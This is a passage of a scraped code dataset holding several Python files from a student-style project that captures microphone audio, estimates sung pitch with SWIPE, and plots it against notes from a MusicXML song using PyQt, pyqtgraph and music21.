StopIteration:\n self.notes_done = True\n\n def assess_pitch(self, pitches, times):\n for (p, t) in zip(pitches, times):\n self.set_current(t)\n if self.current_note.isNote:\n self.current_note.nbr_tries += 1\n if (p >= self.current_note.pitch.midi - 0.5 and\n p <= self.current_note.pitch.midi + 0.5): # ändra till +- 1/2 när någon som kan ta toner ska testa...\n self.current_note.nbr_hits += 1\n ratio = (self.current_note.nbr_hits /\n self.current_note.nbr_tries)\n self.current_note.rect.setBrush(pg.mkBrush((255 * (1 - ratio),\n 255 * ratio, 0)))\n\n def update(self):\n newSwipes, newTimes = self.sweeper.getSwipes()\n if len(newSwipes) > 0 and not self.notes_done:\n # self.notesWizard.assess_pitch(newSwipes, newTimes)\n self.assess_pitch(newSwipes, newTimes)\n self.swipes += newSwipes\n self.times += newTimes\n if len(self.swipes) > 0:\n self.plot_swipe_item.setData(self.times, self.swipes)\n dt = (time.time() - self.t0 - self.t)\n xRange = self.xAxisSwipe.range\n self.plotSwipe.setXRange(xRange[0] + dt, xRange[1] + dt, padding=0)\n self.t = time.time() - self.t0\n self.nowLine.setValue(self.t)\n\n\ndef main():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n sweeper = RTSwipe()\n wizard = NotesWizard(\"Vem_kan_segla.musicxml\")\n rollWindow = RollWindow(sweeper, wizard, updateInterval=70)\n app.aboutToQuit.connect(sweeper.exitHandler)\n rollWindow.show()\n rollWindow.raise_()\n app.exec_()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5743451714515686, "alphanum_fraction": 0.5936055183410645, "avg_line_length": 33.157894134521484, "blob_id": "ac5049afd22b78544e12a3ccf874137852ed91d1", "content_id": "0080fa825daa96f9af3aed7497aa95ad8efb32ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5192, "license_type": "no_license", "max_line_length": 123, "num_lines": 152, "path": "/python/testpy/callb_test.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n self.loop = 0.2 # time between updates of plot in sec, not faster than 0.15-0.2\n self.nbr_pitch = 10 # number of pitches to look for in each loop\n nbr_sec = 10 # number of seconds to display\n self.busy = False\n self.temp = np.empty(0,dtype=np.int16)\n self.t0 = time.perf_counter()\n self.cnt = 1\n\n\n\n self.setup_plot(self.loop)\n self.setup_pyaudio(self.loop)\n self.setup_datavar(self.nbr_pitch, nbr_sec, self.loop)\n\n def setup_pyaudio(self,loop):\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = 2048#int(loop*self.RATE/4)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=True,\n stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n def setup_datavar(self,nbr_pitch,nbr_sec,loop):\n self.t = np.linspace(-nbr_sec,0,num=nbr_sec*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_pitch*self.RATE)\n self.pitch = np.zeros(int(nbr_sec/self.dt*self.RATE))\n self.tp = np.linspace(-nbr_sec,0,num=len(self.pitch))\n\n def setup_plot(self,loop):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n # self.timer = QtCore.QTimer(self)\n # self.timer.setInterval(loop*1000) # in milliseconds\n # self.timer.start()\n # self.timer.timeout.connect(self.onNewData)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n # self.plotSwipe.setLogMode(False,True)\n # self.plotSwipe.enableAutoScale()\n\n self.plotDataItem = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotSoundData = self.plotSound.plot()\n\n def audio_callback(self, in_data, frame_count, time_info, status):\n audio_data = np.frombuffer(in_data, dtype=np.int16)\n # audio_data = audio_data.astype('float16')\n if self.busy:\n self.temp = np.append(self.temp,audio_data)\n else:\n if len(self.temp) > 0:\n audio_data = np.append(self.temp,audio_data)\n self.temp = np.empty(0,dtype=np.int16)\n\n self.sound = np.roll(self.sound,-len(audio_data))\n np.put(self.sound,range(-len(audio_data),-1),audio_data)\n\n tloop = time.perf_counter()-self.t0\n print('time: ', tloop)\n if tloop > self.loop:\n self.t0 = time.perf_counter()\n self.calc_pitch()\n self.plotDataItem.setData(self.tp, self.pitch)\n self.cnt = 0\n else:\n self.cnt = self.cnt+1\n\n # audio_data = audio_data.astype('float64')\n # sw = swipe(audio_data,self.RATE,self.dt,min=40,max=700,threshold=0.15)\n # self.pitch = np.roll(self.pitch,-len(sw))\n # np.put(self.pitch,range(-len(sw),-1),sw)\n #\n # self.plotDataItem.setData(self.tp, self.pitch)\n # self.plotSoundData.setData(self.t, self.sound)\n self.plotSoundData.setData(self.t, self.sound)\n return(in_data,pyaudio.paContinue)\n\n def calc_pitch(self):\n print('calc')\n self.busy = True\n dl = self.cnt*self.CHUNK\n dt = int(dl/self.nbr_pitch)\n data = self.sound[range(-dl,-1)]\n data = data.astype('float64')\n print(dl)\n sw = swipe(data,self.RATE,dt,min=40,max=700,threshold=0.15)\n self.pitch = np.roll(self.pitch,-len(sw))\n\n # self.plotSoundData.setData(self.t, self.sound)\n self.busy = False\n\n def onNewData(self):\n\n tp = time.clock()-self.t0\n dt = int(tp/self.nbr_pitch*self.RATE)\n print('tp: ', tp)\n self.t0 = time.clock()\n # data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n # data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n # data = data.astype('float64')\n # self.sound = np.roll(self.sound,-len(data))\n data = self.sound[range(-int(tp*self.RATE),-1)]\n # np.put(self.sound,range(-len(data),-1),data)\n # sw = swipe(data,self.RATE,dt,min=40,max=700,threshold=0.15)\n # self.pitch = np.roll(self.pitch,-len(sw))\n # np.put(self.pitch,range(-len(sw),-1),sw)\n\n # self.plotDataItem.setData(self.tp, self.pitch)\n # self.plotSoundData.setData(self.t, self.sound)\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5309752821922302, "alphanum_fraction": 0.5528521537780762, "avg_line_length": 30.15286636352539, "blob_id": "b6489352a8146be38fafd69bc30c019ff54b5403", "content_id": "0ca295d4402e99c91d12fbd40cb2ffd95c386465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4891, "license_type": "no_license", "max_line_length": 95, "num_lines": 157, "path": "/python/pitchmp.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nimport multiprocessing as mp\nimport queue\n\nfrom pysptk.sptk import swipe\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = 6000#2*2048\n FORMAT = pyaudio.paInt16\n self.cnt = 0\n tsave = 10\n\n self.unprocessed_sound = mp.Queue()\n self.swipes_toplot = mp.Queue()\n self.shut_down_queue = mp.Queue()\n self.pitch = np.zeros(int(tsave*5*self.RATE/self.CHUNK))\n self.tp = np.linspace(-tsave,0,num=len(self.pitch))\n self.setup_plot()\n\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n self.proc = mp.Process(target=self.do_job)\n self.proc.start()\n\n def do_job(self):\n #print('in do_job')\n while True:\n try:\n self.shut_down_queue.get_nowait()\n except:\n try:\n\n data = self.unprocessed_sound.get_nowait()\n except queue.Empty:\n #print('queue empty')\n time.sleep(0.04)\n else:\n print(self.unprocessed_sound.empty())\n # self.cnt = 0\n #print('Data length: ', len(data))\n data = data.astype('float64')\n #print(len(data))\n t0 = time.perf_counter()\n sw = swipe(data,self.RATE,int(self.CHUNK/5),min=30,max=1200,threshold=0.25)\n print('swipe time: ', time.perf_counter()-t0)\n self.swipes_toplot.put(sw)\n #print('swipe length: ', len(sw))\n else:\n break\n return True\n\n def setup_plot(self):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(20) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.update_plot)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\")\n # self.plotSwipe.setLogMode(x=False,y=True)\n # self.plotSwipe.setXRange(-10, 0, padding=0)\n min_freq = np.log(80)/np.log(2**(1/12))\n max_freq = np.log(800)/np.log(2**(1/12))\n # min_freq = 80\n # max_freq = 500\n self.plotSwipe.setYRange(min_freq,max_freq, padding=0)\n self.plotSwipe.showGrid(True,True,1)\n\n # to fix grid, the same for x axis\n ay = self.plotSwipe.getAxis('left')\n # np.exp(np.log(2**(1/12)*(value+0.5)))\n dy = [(value+0.5, str(value+0.5)) for value in range(int(min_freq),int(max_freq))]\n ay.setTicks([dy, []])\n\n ax = self.plotSwipe.getAxis('bottom')\n dx = [(value, str(value)) for value in np.arange(-10,0,0.75)]\n ax.setTicks([dx, []])\n # time_\n\n # self.plotSwipe.enableAutoScale()\n\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n # self.plot_swipe_item.setLogMode(False,True)\n # self.plot_swipe_item.setXRange(-10, 0, padding=0)\n # self.plot_swipe_item.setYRange(1, 3, padding=0)\n # self.plot_swipe_item.setLogMode(x=None,y=True)\n\n def audio_callback(self, in_data, frame_count, time_info, status):\n\n #print(time.time())\n #print('in callback')\n data = np.frombuffer(in_data,dtype=np.int16)\n #print(type(data.astype('float64')))\n self.unprocessed_sound.put(data)\n\n return(in_data,pyaudio.paContinue)\n\n def myExitHandler(self):\n #print('in exit')\n self.p.close(self.stream)\n self.shut_down_queue.put(True)\n self.proc.join()\n\n\n def update_plot(self):\n try:\n data = self.swipes_toplot.get_nowait()\n except queue.Empty:\n pass\n #print('no swipes')\n else:\n self.pitch = np.roll(self.pitch,-len(data))\n np.put(self.pitch,range(-len(data),-1),data)\n t0 = time.perf_counter()\n self.plot_swipe_item.setData(self.tp,np.log(self.pitch)/np.log(2**(1/12)))\n #print('plot time: ', time.perf_counter()-t0)\n\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n app.aboutToQuit.connect(win.myExitHandler)\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5280411839485168, "alphanum_fraction": 0.5694933533668518, "avg_line_length": 25.177305221557617, "blob_id": "37430f111c49e39d28bd4b7d245063f014f10671", "content_id": "2febb42ab974ac767c9108b8143d935740d7f5bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3691, "license_type": "no_license", "max_line_length": 83, "num_lines": 141, "path": "/python/testpy/test2.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport pyaudio\nimport struct\nimport numpy as np\nimport pysptk.sptk as sptk\nimport time\nimport pyqtgraph as pg\n\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 44100\nloop = 0.2\nCHUNK = int(loop * RATE) # 13000 #int(wlen*RATE)\nwlen = float(CHUNK / RATE)\n\np = pyaudio.PyAudio()\n\nchosen_device_index = -1\nfor x in range(0, p.get_device_count()):\n info = p.get_device_info_by_index(x)\n # print p.get_device_info_by_index(x)\n if info[\"name\"] == \"pulse\":\n chosen_device_index = info[\"index\"]\n print(\"Chosen index: \", chosen_device_index)\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index=chosen_device_index,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\n\n#data = stream.read(CHUNK)\n# data_int16 = struct.unpack(str(CHUNK) + 'h', data)\n\n# draw the figure so the animations will work\nfig = plt.gcf()\nfig.show()\nfig.canvas.draw()\n\nt = np.linspace(-10, 0, num=10 * RATE)\nsound = np.zeros(10 * RATE)\ndt = int(loop / 10 * RATE)\npitch = np.zeros(int(10 / dt * RATE))\ntp = np.linspace(-10, 0, num=len(pitch))\n\nt0 = time.process_time()\nwhile True:\n # compute something\n print('loop', time.process_time() - t0)\n t0 = time.process_time()\n data = np.array(struct.unpack(str(CHUNK) + 'h',\n stream.read(CHUNK, exception_on_overflow=False)))\n t55 = time.process_time()\n print('get rec ', t55 - t0)\n data = data.astype('float64')\n sound = np.roll(sound, -len(data))\n t59 = time.process_time()\n print('roll sound ', t59 - t55)\n\n sw = sptk.swipe(data, RATE, dt, min=40, max=700, threshold=0.25)\n t63 = time.process_time()\n print('swipe', t63 - t59)\n # print(len(sw))\n # t2 = time.process_time()\n # print('Swipe time ',t2-t1)\n\n pitch = np.roll(pitch, -len(sw))\n t70 = time.process_time()\n print('roll pitch ', t70 - t63)\n # print('length from swipe ',len(sw))\n # print('length of pitch ', len(pitch))\n\n # print('Pitch len ',len(pitch))\n # print('sw len ', len(sw))\n # print('pitch time ',dt*len(pitch)/RATE)\n\n # print(pitch)\n\n np.put(sound, range(-len(data), -1), data)\n t84 = time.process_time()\n print('put sound ', t84 - t70)\n np.put(pitch, range(-len(sw), -1), sw)\n t87 = time.process_time()\n print('put pitch ', t87 - t84)\n # t10 = time.process_time()\n # print('75',t10-t2)\n plt.figure(1)\n plt.clf()\n # t3 = time.process_time()\n # # print('78',t3-t10)\n plt.plot(t, sound) # plot something\n\n #\n # plt.pause(0.001) # I ain't needed!!!\n # fig.canvas.draw()\n #\n plt.figure(2)\n plt.clf()\n t103 = time.process_time()\n print('clf ', t103 - t87)\n plt.plot(tp, pitch, '.') # plot something\n\n t4 = time.process_time()\n print('plot', t4 - t103)\n # print('Before pause ',t4-t0)\n # pg.plot(tp, pitch, pen=None, symbol='o')\n # t5 = time.process_time()\n # print('Pause',t5-t4)\n fig.canvas.draw()\n t1 = time.process_time()\n print('canvas draw', t1 - t4)\n twait = loop - (t1 - t0)\n print('twait ', twait)\n if twait > 0.0:\n plt.pause(twait) # I ain't needed!!!\n # time.sleep(twait)\n # time.sleep(0.1)\n else:\n plt.pause(0.001)\n # time.sleep(1)\n # print('wtf')\n print(time.process_time() - t1)\n\n # print(time.process_time()-t5)\n\n # plt.figure(2)\n # plt.clf()\n # plt.plot(tp,pitch,'.')\n # plt.pause(0.005) # I ain't needed!!!\n # fig.canvas.draw()\n\n # update canvas immediately\n #plt.xlim([0, 100])\n #plt.ylim([0, 1000])\n\n # print(data)\n" }, { "alpha_fraction": 0.587395966053009, "alphanum_fraction": 0.6111771464347839, "avg_line_length": 24.484848022460938, "blob_id": "1d8b77f23ef29496c5bc84d78ece46e827a6209d", "content_id": "b171a65596658e245d4e1262622b982566c82459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 841, "license_type": "no_license", "max_line_length": 63, "num_lines": 33, "path": "/erik/testmusicxml.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from music21 import *\nimport numpy as np\n\ndef musicxml2notes(file):\n notes = []\n t = 0\n for element in file.flat.notesAndRests:\n tStart = t\n t+=element.seconds\n tEnd = t\n if element.isNote:\n notes.append((tStart, tEnd, element.pitch.freq440))\n return notes\n\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\nnotes = musicxml2notes(piece)\n\n# for note in notes:\n# print(note)\n\ndef notesTimeMap(times,notes):\n timeNotes = np.zeros(len(times))\n curTime = 0\n for note in notes:\n while curTime < len(times) and time[curTime] < note[0]:\n curTime += 1\n while curTime < len(times) and time[curTime] < note[1]:\n timeNotes[curTime] = note[2]\n curTime += 1\n return timeNotes\n\ntime = np.linspace(-1,32,100)\nn = notesTimeMap(time,notes)\n" }, { "alpha_fraction": 0.57819002866745, "alphanum_fraction": 0.595180332660675, "avg_line_length": 30.51912498474121, "blob_id": "08c12b8642ea583095a4b1b5ba94996f5e6c3812", "content_id": "44de1c9bcf9ef507230f59819940cc7d7cd675c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5768, "license_type": "no_license", "max_line_length": 115, "num_lines": 183, "path": "/erik/pitchrt3.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\nfrom music21 import *\n\npg.setConfigOption('background', 'k')\n\ndef musicxml2notes(file):\n notes = []\n t = 0\n for element in file.flat.notesAndRests:\n tStart = t\n t+=element.seconds\n tEnd = t\n if element.isNote:\n notes.append((tStart, tEnd, element.pitch.freq440))\n return notes\n\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\nnotes = musicxml2notes(piece)\n\ndef notesTimeMap(times,notes):\n timeNotes = np.zeros(len(times))\n curTime = 0\n for note in notes:\n while curTime < len(times) and times[curTime] < note[0]:\n curTime += 1\n while curTime < len(times) and times[curTime] < note[1]:\n timeNotes[curTime] = note[2]\n curTime += 1\n return timeNotes\n\ndef getPieceLength(xml):\n t = 0;\n for e in xml.flat.notesAndRests:\n t += e.seconds\n return t\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, xml, parent=None):\n super().__init__(parent=parent)\n\n\n self.xml = xml # xml file\n self.notes = musicxml2notes(xml)\n self.curNote = 0\n self.displayedNotes = []\n\n self.notesf = []\n self.tn = []\n self.threshold = 1.03\n\n self.simTime = 0 # current time in simulation\n self.endTime = getPieceLength(self.xml)\n self.displayBefore = 5 # seconds displayed ahead of time\n self.displayAfter = 5 # seconds of displayed history\n\n self.loop = 0.2 # time between updates of plot in sec, not faster than 0.15-0.2\n self.pitchBatch = 10 # number of pitches to look for in each loop\n\n self.setupAudio()\n self.setup_plot()\n\n self.sound = np.zeros(self.displayAfter*self.SAMPLERATE) # vector to store sound\n self.ts = np.linspace(0,self.endTime,len(self.sound))\n\n self.pitches = np.zeros(int(self.displayAfter*self.pitchBatch/self.loop)) # vector to store pitch estimates\n self.tp = np.linspace(0,self.endTime,len(self.pitches))\n\n self.dt = int(self.loop/self.displayAfter*self.SAMPLERATE)\n\n self.startTimer()\n\n \n\n def startTimer(self):\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(self.loop*1000) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.timerEvent)\n\n def setupAudio(self):\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.SAMPLERATE = 48000 # TODO: find input sampling frequency\n self.CHUNK = int(self.loop*self.SAMPLERATE)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format = FORMAT,\n channels = CHANNELS,\n rate = self.SAMPLERATE,\n input = True,\n output = True,\n #stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n def setup_plot(self):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n #self.plotSwipe.setLogMode(False,True)\n #self.plotSwipe.enableAutoScale()\n\n self.plotPitches = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotNotes = self.plotSwipe.plot([], pen=None,\n symbolBrush=(0,0,255), symbolSize=2, symbolPen=None, connect='pairs')\n self.plotSound = self.plotSound.plot()\n\n def timerEvent(self):\n if self.simTime > self.endTime:\n self.timer.stop()\n self.simTime += self.loop\n self.updateSound()\n self.updateNotes()\n self.addNotes()\n self.draw()\n\n def updateSound(self):\n data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n data = data.astype('float64')\n\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n self.ts += self.loop\n\n sw = swipe(data,self.SAMPLERATE,self.dt,min=40,max=700,threshold=0.25)\n self.pitches = np.roll(self.pitches,-len(sw))\n np.put(self.pitches,range(-len(sw),-1),sw)\n self.tp += self.loop\n\n def updateNotes(self):\n while self.curNote < len(self.notes) and self.notes[self.curNote][1] < self.simTime:\n self.displayedNotes.append(self.notes[self.curNote])\n self.curNote += 1\n if len(self.displayedNotes) > 0 and self.displayedNotes[0][2] < self.simTime - self.displayBefore:\n del(self.displayedNotes[0])\n del(self.tn[0:7])\n del(self.notesf[0:7])\n\n def draw(self):\n self.plotPitches.setData(self.tp, self.pitches)\n self.plotSound.setData( self.ts, self.sound)\n self.plotNotes.setData( self.tn, self.notesf)\n\n def addNotes(self):\n for note in self.displayedNotes:\n t = [note[0], note[1]]\n t = [val for val in t for _ in (0, 1)]\n t = np.roll(t,1)\n f = [note[2]/self.threshold, note[2]*self.threshold]\n f = [val for val in t for _ in (0, 1)]\n f = np.roll(f,1)\n\n if len(self.displayedNotes) > 0:\n self.tn.append(t)\n self.notesf.append(f)\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=True) # True seems to work as well\n\n win = MyWidget(piece)\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5805515050888062, "alphanum_fraction": 0.6034107208251953, "avg_line_length": 23.389381408691406, "blob_id": "923212906b812b8e882842d05020fb2a132e77b2", "content_id": "6a7a55ec7f1f4fe203321f4fe33d0901db49bd42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2756, "license_type": "no_license", "max_line_length": 76, "num_lines": 113, "path": "/python/testpy/audiomp.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import multiprocessing as mp\nimport pyaudio\nimport numpy as np\nimport time\nfrom pysptk.sptk import swipe\nimport queue\nimport pyqtgraph as pg\nfrom PyQt5 import QtCore, QtWidgets\n\nCHANNELS = 1\nRATE = 44100\nCHUNK = 6000#2*2048\nFORMAT = pyaudio.paInt16\ncnt = 0\ntsave = 10\n\nunprocessed_sound = mp.Queue()\nswipes_toplot = mp.Queue()\npitch = np.zeros(int(tsave*5*RATE/CHUNK))\ntp = np.linspace(-tsave,0,num=len(pitch))\n\n# app = QtWidgets.QApplication([])\nwid = pg.GraphicsWindow()\nwid.show()\nwid.raise_()\nmainLayout = QtWidgets.QVBoxLayout()\nwid.setLayout(mainLayout)\n# app.exec_()\nplot_swipe = wid.addPlot(title='Swipe mp')\nplot_swipe_item = plot_swipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n\n\ndef audio_callback(in_data, frame_count, time_info, status):\n print('in callback')\n data = np.frombuffer(in_data,dtype=np.int16)\n unprocessed_sound.put(data)\n\n return(in_data,pyaudio.paContinue)\n\ndef do_job():\n # global unprocessed_sound\n global cnt,pitch,tp\n print('in do_job')\n while True:\n try:\n data = unprocessed_sound.get_nowait()\n except queue.Empty:\n print('swipe empty')\n cnt += 1\n print('queue empty, cnt: ', cnt)\n if cnt > 3:\n break\n time.sleep(0.1)\n else:\n cnt = 0\n print('Data length: ', len(data))\n data = data.astype('float64')\n t0 = time.perf_counter()\n sw = swipe(data,RATE,int(CHUNK/5),min=30,max=800,threshold=0.25)\n print('swipe time: ', time.perf_counter()-t0)\n swipes_toplot.put(sw)\n print('swipe length: ', len(sw))\n return True\n\ndef setup_pyqt():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False)\n mainLayout = QtWidgets.QVBoxLayout()\n setLayout(mainLayout)\n\ndef update_plot():\n try:\n data = swipes_toplot.get_nowait()\n except queue.Empty:\n print('no swipes')\n else:\n pitch = np.roll(pitch,-len(data))\n np.put(pitch,range(-len(data),-1),data)\n plot_swipe_item.setData(tp,pitch)\n\ndef main():\n\n p = pyaudio.PyAudio()\n stream = p.open(\n rate=RATE,\n channels=CHANNELS,\n format=FORMAT,\n input=True,\n stream_callback=audio_callback,\n frames_per_buffer=CHUNK\n )\n time.sleep(1)\n timer = QtCore.QTimer(wid)\n timer.setInterval(50) # in milliseconds\n timer.start()\n timer.timeout.connect(update_plot)\n\n proc = mp.Process(target=do_job)\n proc.start()\n # time.sleep(5)\n x = 0\n while x <1000:\n print(x)\n x += 1\n time.sleep(0.02)\n p.close(stream)\n proc.join()\n\n print('done??')\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5858112573623657, "alphanum_fraction": 0.6146101355552673, "avg_line_length": 26.21019172668457, "blob_id": "fcebce3533b6bc36454703b652d0f9694add4159", "content_id": "c49b2dd96cdb8efe468a221dd57bf4bc2b57da7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4271, "license_type": "no_license", "max_line_length": 138, "num_lines": 157, "path": "/erik/test3.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from music21 import *\nfrom tkinter import *\nfrom tkinter import filedialog\nimport threading\nimport math\nfrom datetime import datetime\n\n\n#path = filedialog.askopenfilename()\npath = \"Vem_kan_segla.musicxml\"\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\n\n\n\n\nupcoming = []\n\nt = 0\nmidimax = 0\nmidimin = 9999\nfor e in piece.flat.notesAndRests:\n if e.isNote:\n #print(e.pitch.midi)\n midimax = max(midimax,e.pitch.midi)\n midimin = min(midimin,e.pitch.midi)\n setattr(e,\"time\",t)\n setattr(e,\"passed\",0)\n setattr(e,\"hits\",0)\n setattr(e,\"misses\",0)\n t += e.seconds\n upcoming.append(e)\n\nmidirange = midimax-midimin+1\n\ncTime = 0\ndTime = 12\n\nclass Pitch():\n def __init__(self, time, freq):\n self.time = time\n self.freq = freq\n\nclass RollCanvas(Canvas):\n def __init__(self,midimin,midimax,tempo,timeSig,dTime=10, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.midimin = midimin\n self.midimax = midimax\n self.midirange = midimax-midimin+1\n self.freqmin = self.midi2freq(midimin)/(2**(1/24))\n self.freqmax = self.midi2freq(midimax)*(2**(1/24))\n self.freqrange = self.freqmax-self.freqmin\n self.dTime = dTime\n self.tempo = tempo/60 # bps instead of bpm\n self.timeSig = timeSig\n\n def w(self):\n return self.winfo_width()\n\n def h(self):\n return self.winfo_height()\n\n def time2px(self,time, cTime):\n return (time-cTime)/self.dTime*self.w() + self.w()/2\n\n def midi2px(self,midi):\n return self.h()-(midi-self.midimin)*self.h()/self.midirange\n\n def freq2px(self,freq):\n pass\n\n def midi2freq(self,midi):\n a = 440 #frequency of A (coomon value is 440Hz)\n return (a / 32) * (2 ** ((midi - 9) / 12))\n\n def drawLines(self, cTime):\n # Note lines\n for i in range(1,self.midirange):\n y = self.h()/self.midirange*i\n self.create_line(0,y,self.w(),y,fill=\"#444444\")\n # Bar Lines\n nBars = math.ceil(self.dTime*self.tempo/self.timeSig)\n for i in range(-math.ceil(nBars/2),math.ceil(nBars/2)):\n for j in range(self.timeSig):\n x = (i*self.timeSig+j)*self.w()/(self.dTime*self.tempo)+self.w()/2-self.w()*(cTime%(self.timeSig/(self.tempo)))/self.dTime\n if j%self.timeSig==0:\n self.create_line(x,0,x,self.h(),fill=\"#555555\")\n else:\n self.create_line(x,0,x,self.h(),fill=\"#444444\",dash=(4,4))\n x = i/self.dTime*self.h()+(cTime%(self.tempo*self.timeSig))*self.h()\n \n # Now-line\n self.create_line(self.w()/2,0,self.w()/2,self.h(),fill=\"white\")\n\n def drawNote(self,note,cTime):\n x0 = self.time2px(note.time,cTime)\n x1 = self.time2px(note.time+note.seconds,cTime)\n y0 = self.midi2px(note.pitch.midi)\n y1 = y0 - self.h()/self.midirange\n if note.time < cTime:\n color = \"red\"\n else:\n color = \"grey\"\n self.create_rectangle(x0, y0, x1, y1, fill=color)\n\n def drawPitch(self,pitch):\n w = self.winfo_width()\n h = self.winfo_height()\n\n\nmaster = Tk()\nmaster.title(\"StarSingers\")\n\nwRef = 100\nwCan = 900\nhNotes = 250\nhRoll = 350\n\nnotesFrame = Frame(master)\nnotesFrame.pack()\n\nrollFrame = Frame(master)\nrollFrame.pack()\n\nnotesReference = Canvas(notesFrame, width=wRef,height=hNotes)\nnotesReference.grid(row=0,column=0)\n\nnotesCanvas = Canvas(notesFrame, width=wCan,height=hNotes)\nnotesCanvas.grid(row=0,column=1)\n\nrollReference = Canvas(rollFrame, width=wRef,height=hRoll,bg=\"black\")\nrollReference.grid(row=0,column=0)\n\nrollCanvas = RollCanvas(midimin,midimax,90,3,10,rollFrame, width=wCan,height=hRoll,bg=\"black\")\nrollCanvas.grid(row=0,column=1)\n\nmaster.update()\n\n\ndef drawUpcoming():\n for e in upcoming:\n if e.isNote:\n rollCanvas.drawNote(e,cTime)\n\nlooplen = 20; # length of loop in milliseconds\n\ndef loop():\n global cTime\n millis1 = 